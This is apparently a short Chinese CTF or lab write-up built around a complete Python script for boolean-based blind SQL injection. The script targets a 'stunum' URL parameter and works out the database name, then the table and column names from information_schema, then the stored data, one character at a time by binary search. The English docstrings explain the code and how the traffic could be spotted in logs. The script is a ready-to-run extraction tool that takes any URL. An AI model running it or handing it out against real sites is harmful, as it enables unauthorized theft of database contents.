如下:
输入正确的话可以有固定回显，其他的没有。经过测试，其实并没有把数据库中的内容提出来显示，因此只能盲注了。
脚本如下:
import time
import requests
import re
# Marker substring searched for in the page's <h2 class="mb"> text; the probe
# functions below treat its presence as the "condition true" response.
Success_message = "Hi"
def cont(text: str) -> str:
    """Return the inner text of the last ``<h2 class="mb">…</h2>`` in *text*.

    The regex is non-greedy and DOTALL, so the element may span lines. Every
    match overwrites ``c``, hence only the last match is returned.
    NOTE: when there is no match at all, ``c`` is never bound and the
    ``return`` raises ``UnboundLocalError`` — callers assume the element is
    always present in the response.
    """
    obj=re.compile(r'<h2 class="mb">(?P<xiao>.*?)</h2>',re.S)
    res = obj.finditer(text)
    for i in res:
        c=(i.group("xiao"))
    return c
def database_name() -> str:
    """Recover the current schema name one character at a time and return it.

    Reads the module-level ``url`` (assigned under ``__main__``). For each of
    at most 9 character positions a binary search over the printable ASCII
    range 32..126 is driven by the page's boolean response: the request asks
    whether the character's code is greater than ``mid``, and ``cont()``
    containing ``Success_message`` is taken as "yes".

    Detection note: each recovered character costs several GET requests to the
    same path whose ``stunum`` parameter differs only in two integers; that
    burst pattern is what an access-log review or WAF rule would key on.
    """
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        # Narrow [begin, end) until a single code point remains.
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        # Search settled on the lower bound: presumably past the end of the
        # string (substr returned nothing), so stop — emits an empty line first.
        if mid == 32:
            print()
            break
        db_name += chr(mid)
    print("数据库名: " + db_name)
    return db_name
def table_name() -> None:
    """Recover the comma-joined table list of the current schema, then descend.

    Same per-character binary search as ``database_name`` (range 32..126,
    up to 99 positions, module-level ``url``), with a 0.2 s pause before
    every request. The recovered string is split on ``,`` and
    ``column_name`` is called for each table. Returns nothing.
    """
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            # Fixed delay between probes; this does not change the result, only
            # spreads the request burst out over time.
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        # Lower bound reached: treated as end of string.
        if mid == 32:
            print()
            break
        name += chr(mid)
    print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)
def column_name(tab_name: str) -> None:
    """Recover the comma-joined column list of *tab_name*, then fetch each column.

    *tab_name* is interpolated into the query inside double quotes; a name
    containing ``"`` or ``,`` would therefore not be handled. Per-character
    search, delay and termination are identical to ``table_name``. Each
    recovered column name is passed to ``get_data``. Returns nothing.
    """
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        # Lower bound reached: treated as end of string.
        if mid == 32:
            print()
            break
        name += chr(mid)
    # Runtime string kept as-is (Chinese label); tab_name is substituted after
    # the concatenation, so a '%' inside ``name`` would break the format.
    print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)
def get_data(tab_name: str, col_name: str) -> None:
    """Recover the value selected from *col_name* of *tab_name*, one char at a time.

    Only the first value of the subquery is read (no ``group_concat`` here).
    Search range, 0.2 s delay and the ``mid == 32`` stop condition match the
    other probe functions; ``url`` is the module-level global. Returns nothing.
    """
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        # Lower bound reached: treated as end of string.
        if mid == 32:
            print()
            break
        data += chr(mid)
    # Format is applied after concatenation; a '%' inside ``data`` would break it.
    print(("%s表的%s字段数据: " + data) % (tab_name, col_name))
if __name__ == '__main__':
    # ``url`` is a module global: every probe function above reads it directly,
    # so the script only works when run as a program, not when imported.
    url = input("请输入url:")
    # table_name() walks down to column_name() and get_data() on its own.
    database_name()
    table_name()